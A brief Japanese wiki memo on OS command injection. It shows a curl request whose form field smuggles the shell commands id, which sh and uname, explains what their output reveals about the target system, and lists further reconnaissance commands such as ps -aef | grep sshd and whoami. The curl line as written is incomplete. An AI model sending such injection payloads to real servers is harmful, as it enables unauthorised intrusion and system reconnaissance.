趣旨

OSコマンドインジェクションの記事をみかけたので、メモしておく

情報元

http://m1n0x.hp2.jp/blog/archives/179

curlコマンド

curl -d comment=%3bid%3bwhich%20sh%3buname%

ユーザ情報を表示する

コマンドが実行されたユーザIDとグループID、
shコマンドの実体のパス、
CPU種別・ホスト名・OS名・OSのリリース番号・カーネルのバージョンが表示される

formに埋め込むコマンド

%3bid%3bwhich%20sh%3buname%

意味

";id;which sh;uname%"
idコマンドユーザーIDやグループIDを表示する
whichコマンドコマンドの絶対パスを知る
unameコマンドOSの情報を知るのに使う

つかうコマンド

全てのユーザのプロセス情報をツリー構造で表示し、それをgrepにかけてsshdが含まれる行を抽出

ps -aef |grep sshd

システム名と実行したユーザーの名前を表示

uname -a;whoami

URLエンコード・デコードフォーム

URL

http://www.tagindex.com/tool/url.html

トップ   編集 凍結 差分 バックアップ 添付 複製 名前変更 リロード   新規 一覧 単語検索 最終更新   ヘルプ   最終更新のRSS
Last-modified: 2012-04-18 (水) 23:57:01 (3469d)